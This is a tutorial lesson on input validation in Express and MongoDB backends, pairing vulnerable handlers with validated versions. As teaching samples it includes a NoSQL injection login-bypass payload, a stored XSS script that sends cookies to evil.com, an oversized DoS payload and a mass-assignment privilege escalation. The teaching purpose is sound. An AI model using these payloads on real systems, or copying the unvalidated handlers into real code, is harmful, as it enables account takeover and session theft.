Episode 3 — NodeJS MongoDB Backend Architecture / 3.10 — Input Validation

3.10.a — Why Validation Matters

Input validation is the practice of checking data against expected formats, types, and constraints before processing. It protects data integrity, prevents security vulnerabilities, and improves user experience.


< README | 3.10.b — Express Validator >


1. What Is Input Validation?

Validation is the process of verifying that incoming data meets your application's expectations before it enters your business logic or database.

User Input --> [VALIDATION LAYER] --> Business Logic --> Database
                   |
                   v
              Reject bad data
              with clear errors

Every piece of data that crosses a trust boundary must be validated:

  • HTTP request bodies (POST/PUT data)
  • URL parameters (/users/:id)
  • Query strings (?page=1&limit=10)
  • HTTP headers (authorization tokens, content types)
  • File uploads (type, size, name)
  • Data from external APIs or services

2. Data Integrity

Without validation, your database fills with inconsistent, malformed data that breaks downstream systems.

What Goes Wrong

// No validation — anything goes into the database
app.post('/users', async (req, res) => {
  const user = await User.create(req.body);
  res.json(user);
});

// These all succeed — and they should NOT:
// { email: "not-an-email", age: -5, name: "" }
// { email: 123, age: "old", name: null }
// { unexpectedField: "malicious data" }

Real Consequences

ProblemExampleImpact
Wrong typeage: "twenty" instead of age: 20Calculations break, sorting fails
Missing required fieldsNo email on a user recordCannot send notifications, login fails
Out-of-range valuesquantity: -50 on an orderInventory goes negative, financial errors
Malformed referencesuserId: "abc" instead of valid ObjectIdBroken joins, orphaned records
Duplicate entriesTwo accounts with same emailAuth confusion, data leaks

3. Security Threats Without Validation

3.1 SQL/NoSQL Injection

// Without validation — MongoDB injection
app.post('/login', async (req, res) => {
  const { username, password } = req.body;
  
  // Attacker sends: { username: { "$gt": "" }, password: { "$gt": "" } }
  // This query matches ANY document where username and password exist
  const user = await User.findOne({ username, password });
  // Attacker is logged in as the first user in the collection
});

// With validation — injection blocked
app.post('/login',
  body('username').isString().trim().isLength({ min: 3, max: 30 }),
  body('password').isString().isLength({ min: 8 }),
  async (req, res) => {
    const errors = validationResult(req);
    if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
    
    // username and password are guaranteed to be strings now
    const user = await User.findOne({ 
      username: req.body.username 
    });
    const isMatch = await bcrypt.compare(req.body.password, user.password);
  }
);

3.2 Cross-Site Scripting (XSS)

// Without validation — stored XSS
app.post('/comments', async (req, res) => {
  // Attacker sends: { text: "<script>document.location='https://evil.com/steal?cookie='+document.cookie</script>" }
  const comment = await Comment.create({ text: req.body.text });
  // When other users view this comment, the script executes in their browser
});

// With sanitization — XSS blocked
const { body } = require('express-validator');

app.post('/comments',
  body('text').trim().escape().isLength({ min: 1, max: 5000 }),
  async (req, res) => {
    // .escape() converts < > & " ' to HTML entities
    // "<script>" becomes "&lt;script&gt;"
  }
);

3.3 Denial of Service (DoS)

// Without validation — DoS via payload size
app.post('/search', async (req, res) => {
  // Attacker sends: { query: "a".repeat(10_000_000) }
  // Or: { items: Array(1_000_000).fill("data") }
  // Server runs out of memory processing this
  const results = await Product.find({ name: new RegExp(req.body.query) });
});

// With validation — payload constrained
app.post('/search',
  body('query').isString().isLength({ min: 1, max: 200 }),
  body('items').optional().isArray({ max: 100 }),
  // Server rejects oversized payloads immediately
);

4. Server-Side vs Client-Side Validation

                  CLIENT-SIDE                          SERVER-SIDE
            ┌─────────────────────┐            ┌─────────────────────────┐
            │  Quick feedback     │            │  Security enforcement   │
            │  Reduces requests   │            │  Data integrity         │
            │  Better UX          │            │  Cannot be bypassed     │
            │  CAN be bypassed    │            │  Canonical source       │
            └─────────────────────┘            └─────────────────────────┘
                     │                                    │
                     └──────────── BOTH ARE NEEDED ───────┘
AspectClient-SideServer-Side
PurposeUX improvementSecurity enforcement
Can be bypassed?Yes (DevTools, curl, Postman)No
Feedback speedInstantRequires round-trip
Where it runsBrowser (JavaScript)Server (Node.js)
Required?Nice to haveAbsolutely mandatory

Why Client-Side Alone Is Never Enough

# Anyone can bypass client-side validation with curl:
curl -X POST http://localhost:3000/api/users \
  -H "Content-Type: application/json" \
  -d '{"email": "not-valid", "age": -999, "role": "admin"}'

# Or with browser DevTools:
# 1. Open Network tab
# 2. Edit and resend any request
# 3. All client-side validation is bypassed

5. Defense in Depth

Validate at every boundary, not just one layer:

┌──────────────────────────────────────────────────────────┐
│  Layer 1: Client-Side Validation (HTML5 + JavaScript)    │
│  ┌────────────────────────────────────────────────────┐  │
│  │  Layer 2: API Gateway / Rate Limiting              │  │
│  │  ┌──────────────────────────────────────────────┐  │  │
│  │  │  Layer 3: Express Middleware Validation       │  │  │
│  │  │  ┌────────────────────────────────────────┐  │  │  │
│  │  │  │  Layer 4: Mongoose Schema Validation   │  │  │  │
│  │  │  │  ┌──────────────────────────────────┐  │  │  │  │
│  │  │  │  │  Layer 5: MongoDB Schema Rules   │  │  │  │  │
│  │  │  │  └──────────────────────────────────┘  │  │  │  │
│  │  │  └────────────────────────────────────────┘  │  │  │
│  │  └──────────────────────────────────────────────┘  │  │
│  └────────────────────────────────────────────────────┘  │
└──────────────────────────────────────────────────────────┘
// Layer 3: Express middleware validation
const validateRegistration = [
  body('email').isEmail().normalizeEmail(),
  body('password').isStrongPassword(),
  body('age').isInt({ min: 13, max: 120 }),
];

// Layer 4: Mongoose schema validation
const userSchema = new mongoose.Schema({
  email: {
    type: String,
    required: [true, 'Email is required'],
    match: [/^\S+@\S+\.\S+$/, 'Invalid email format'],
    unique: true,
    lowercase: true,
    trim: true,
  },
  password: {
    type: String,
    required: [true, 'Password is required'],
    minlength: [8, 'Password must be at least 8 characters'],
  },
  age: {
    type: Number,
    min: [13, 'Must be at least 13 years old'],
    max: [120, 'Invalid age'],
  },
});

6. Validation vs Sanitization

These are related but distinct operations:

ConceptPurposeExample
ValidationCheck if data meets rules — accept or rejectIs "hello@email.com" a valid email?
SanitizationTransform data to be safe/cleanTrim whitespace, escape HTML, normalize email
const { body } = require('express-validator');

app.post('/profile',
  // VALIDATION — reject if rules not met
  body('email').isEmail(),                      // Must be valid email
  body('age').isInt({ min: 0, max: 150 }),      // Must be integer 0-150
  body('website').optional().isURL(),           // If present, must be URL

  // SANITIZATION — transform the data
  body('email').normalizeEmail(),               // "John@GMAIL.COM" -> "john@gmail.com"
  body('name').trim().escape(),                 // "  <b>John</b>  " -> "John"
  body('age').toInt(),                          // "25" -> 25
);

Order Matters

// WRONG: sanitize before validate — may hide invalid input
body('age').toInt().isInt({ min: 0 });
// "abc" -> NaN -> fails isInt (works here by luck)
// But: "12abc" -> 12 -> passes isInt (BAD — original input was invalid)

// RIGHT: validate first, then sanitize
body('age').isInt({ min: 0 }).toInt();
// "12abc" -> fails isInt immediately (GOOD)
// "12" -> passes isInt -> converted to number 12

7. Real-World Validation Failures

Case 1: Mass Assignment Vulnerability

// Dangerous: accepting entire req.body
app.put('/users/:id', async (req, res) => {
  await User.findByIdAndUpdate(req.params.id, req.body);
  // Attacker sends: { role: "admin", verified: true }
  // They just elevated their own privileges
});

// Safe: validate and whitelist fields
app.put('/users/:id',
  body('name').optional().isString().trim().isLength({ max: 100 }),
  body('bio').optional().isString().trim().isLength({ max: 500 }),
  async (req, res) => {
    const { name, bio } = req.body; // Only extract allowed fields
    await User.findByIdAndUpdate(req.params.id, { name, bio });
  }
);

Case 2: Type Coercion Bugs

// JavaScript type coercion creates unexpected behavior
"5" > "12"   // true (string comparison: "5" > "1")
"5" > 12     // false (number comparison: 5 > 12)

// Without validation, query parameters are always strings
app.get('/products', async (req, res) => {
  // req.query.minPrice is "5" (string), not 5 (number)
  // MongoDB comparison with string vs number fields may give wrong results
  const products = await Product.find({ price: { $gte: req.query.minPrice } });
});

Key Takeaways

  1. Never trust user input — validate everything that crosses a trust boundary
  2. Server-side validation is mandatory — client-side validation is only for UX
  3. Validate AND sanitize — validation rejects bad data, sanitization cleans good data
  4. Defense in depth — validate at every layer (middleware, schema, database)
  5. Whitelist fields — never pass raw req.body to database operations
  6. Security threats — injection, XSS, and DoS attacks all exploit missing validation

Explain-It Challenge

Imagine you are building a public API for a banking application. A junior developer suggests that since the mobile app validates all inputs before sending requests, server-side validation is unnecessary. Explain in detail why this reasoning is flawed, what specific attacks could exploit this gap, and design a multi-layer validation strategy for a money transfer endpoint (POST /transfer with recipientId, amount, and note fields).